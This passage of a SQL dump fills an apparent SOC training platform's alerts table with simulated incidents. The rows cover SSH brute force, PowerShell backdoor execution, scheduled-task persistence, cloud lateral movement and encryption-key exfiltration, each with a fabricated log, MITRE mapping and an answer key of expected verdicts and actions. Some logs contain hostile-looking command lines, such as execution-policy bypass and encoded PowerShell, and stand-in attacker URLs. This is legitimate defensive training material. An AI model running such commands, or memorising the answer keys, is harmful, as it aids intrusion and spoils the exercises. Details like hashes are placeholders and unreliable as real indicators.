[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.220.101.5\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_filename\\\":\\\"uber_customer_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"forum_url\\\":\\\"http://darkwebforum.example/disclosure/uber-leak\\\",\\\"malicious_actor\\\":\\\"Lapsus$\\\",\\\"action\\\":\\\"Data Public Disclosure\\\",\\\"target\\\":\\\"Uber\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.567Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.220.101.5\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_filename\\\":\\\"uber_customer_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"forum_url\\\":\\\"http://darkwebforum.example/disclosure/uber-leak\\\",\\\"malicious_actor\\\":\\\"Lapsus$\\\",\\\"action\\\":\\\"Data Public Disclosure\\\",\\\"target\\\":\\\"Uber\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.567Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.220.101.5\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_filename\\\":\\\"uber_customer_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"forum_url\\\":\\\"http://darkwebforum.example/disclosure/uber-leak\\\",\\\"malicious_actor\\\":\\\"Lapsus$\\\",\\\"action\\\":\\\"Data Public Disclosure\\\",\\\"target\\\":\\\"Uber\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.567Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.220.101.5\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_filename\\\":\\\"uber_customer_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"forum_url\\\":\\\"http://darkwebforum.example/disclosure/uber-leak\\\",\\\"malicious_actor\\\":\\\"Lapsus$\\\",\\\"action\\\":\\\"Data Public Disclosure\\\",\\\"target\\\":\\\"Uber\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(892, 'Suspicious Login Detected on DevOps Engineer\'s Home Network', 'high', 'Network logs', 'An unauthorized login attempt was detected from an external IP address on the DevOps engineer\'s home network. The attacker exploited weak credentials to gain initial access, potentially targeting corporate assets.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"devops_admin\",\"login_status\":\"successful\",\"method\":\"SSH\",\"reason\":\"Weak password\",\"device\":\"HomeRouter\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"filename\":\"malicious_payload.sh\"}', '2026-01-15 00:59:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known threat actor activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Home network device\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"devops_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Username targeted by brute force attempts\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious payloads.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_payload.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Filename used in previous attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(893, 'Malicious Script Execution Identified on Compromised Machine', 'high', 'Endpoint Detection and Response (EDR) alerts', 'A custom script was executed on a compromised machine to install a backdoor for persistent access and command execution. The script was executed by an unauthorized process, indicating advanced attacker capabilities.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:28Z\",\"event_id\":\"EDR-20231015-00234\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"compromised-host\",\"user_name\":\"john.doe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"file_hash\":\"3f1c5a7b2c4f8e9d5f6e7b8c9d10e2a3\",\"attacker_ip\":\"203.0.113.45\",\"attacker_domain\":\"malicious-actor.com\",\"attacker_url\":\"http://malicious-actor.com/backdoor\",\"file_path\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\"}', '2026-01-15 00:59:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP address of the compromised host within the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f1c5a7b2c4f8e9d5f6e7b8c9d10e2a3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with well-known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-actor.com/backdoor\",\"is_critical\":false,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"suspicious\",\"details\":\"URL linked to suspicious activity.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to establish backdoor access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(894, 'Backdoor Persistence Mechanism Activated', 'high', 'System logs', 'An advanced persistence mechanism was activated on the compromised machine, allowing the attacker to maintain access without re-exploiting vulnerabilities. This action is characteristic of advanced persistent threats that aim to stay undetected for extended periods.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:32:18Z\",\"event_id\":\"4720\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"user\":\"compromised_user\",\"action\":\"Scheduled Task Created\",\"task_name\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\CriticalUpdate\",\"task_command\":\"C:\\\\Windows\\\\System32\\\\wscript.exe C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\update.vbs\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_name\":\"update.vbs\"}', '2026-01-15 00:59:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network address of compromised machine.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash found in multiple malware reports.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"update.vbs\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Script used to maintain persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:18Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update.vbs\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"update.vbs\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:18Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update.vbs\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"update.vbs\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:18Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update.vbs\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"update.vbs\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:18Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update.vbs\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"update.vbs\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:18Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update.vbs\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"update.vbs\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(895, 'Unauthorized Access to Corporate Cloud Environment', 'high', 'Cloud access logs', 'An attacker used stolen credentials to move laterally into the corporate cloud environment from a compromised home machine. The attacker targeted critical infrastructure and attempted to access sensitive data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.20.30.40\",\"user\":\"jdoe\",\"action\":\"login\",\"status\":\"success\",\"auth_method\":\"password\",\"suspicious_file\":\"malicious_payload.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"accessed_resource\":\"sensitive_data_vault\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-15 00:59:56', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Corporate cloud environment IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials were compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.572Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.20.30.40\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"auth_method\\\":\\\"password\\\",\\\"suspicious_file\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"accessed_resource\\\":\\\"sensitive_data_vault\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.572Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.20.30.40\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"auth_method\\\":\\\"password\\\",\\\"suspicious_file\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"accessed_resource\\\":\\\"sensitive_data_vault\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.572Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.20.30.40\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"auth_method\\\":\\\"password\\\",\\\"suspicious_file\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"accessed_resource\\\":\\\"sensitive_data_vault\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.572Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.20.30.40\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"auth_method\\\":\\\"password\\\",\\\"suspicious_file\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"accessed_resource\\\":\\\"sensitive_data_vault\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.572Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.20.30.40\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"auth_method\\\":\\\"password\\\",\\\"suspicious_file\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"accessed_resource\\\":\\\"sensitive_data_vault\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(896, 'Extraction of Encryption Keys from Cloud Storage', 'critical', 'Data access logs', 'An advanced exfiltration operation targeting cloud storage for the extraction of encryption keys used to decrypt user vaults. The attacker accessed and exfiltrated sensitive encryption keys stored within a cloud environment, potentially compromising the integrity of encrypted data for millions of users.', 'Exfiltration', 'T1567 - Exfiltration Over Web Service', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-28T13:45:27Z\",\"event_id\":\"9876543210\",\"action\":\"EXFILTRATION\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.42\",\"username\":\"malicious_actor\",\"file_exfiltrated\":\"encryption_keys_backup_20231028.tar.gz\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"cloud_service_provider\":\"aws\",\"bucket_name\":\"sensitive-keys-backup\",\"user_agent\":\"python-requests/2.25.1\",\"status\":\"SUCCESS\"}', '2026-01-15 00:59:56', '2026-02-16 17:55:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelligencePlatform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalLogs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the cloud storage server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"malicious_actor\",\"is_critical\":true,\"osint_result\":{\"source\":\"SecurityReports\",\"verdict\":\"malicious\",\"details\":\"Username used in previous unauthorized access attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"encryption_keys_backup_20231028.tar.gz\",\"is_critical\":true,\"osint_result\":{\"source\":\"FileAnalysis\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive encryption keys.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash linked to potential data exfiltration scripts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.574Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-28T13:45:27Z\\\",\\\"event_id\\\":\\\"9876543210\\\",\\\"action\\\":\\\"EXFILTRATION\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.42\\\",\\\"username\\\":\\\"malicious_actor\\\",\\\"file_exfiltrated\\\":\\\"encryption_keys_backup_20231028.tar.gz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"cloud_service_provider\\\":\\\"aws\\\",\\\"bucket_name\\\":\\\"sensitive-keys-backup\\\",\\\"user_agent\\\":\\\"python-requests/2.25.1\\\",\\\"status\\\":\\\"SUCCESS\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.574Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-28T13:45:27Z\\\",\\\"event_id\\\":\\\"9876543210\\\",\\\"action\\\":\\\"EXFILTRATION\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.42\\\",\\\"username\\\":\\\"malicious_actor\\\",\\\"file_exfiltrated\\\":\\\"encryption_keys_backup_20231028.tar.gz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"cloud_service_provider\\\":\\\"aws\\\",\\\"bucket_name\\\":\\\"sensitive-keys-backup\\\",\\\"user_agent\\\":\\\"python-requests/2.25.1\\\",\\\"status\\\":\\\"SUCCESS\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.574Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 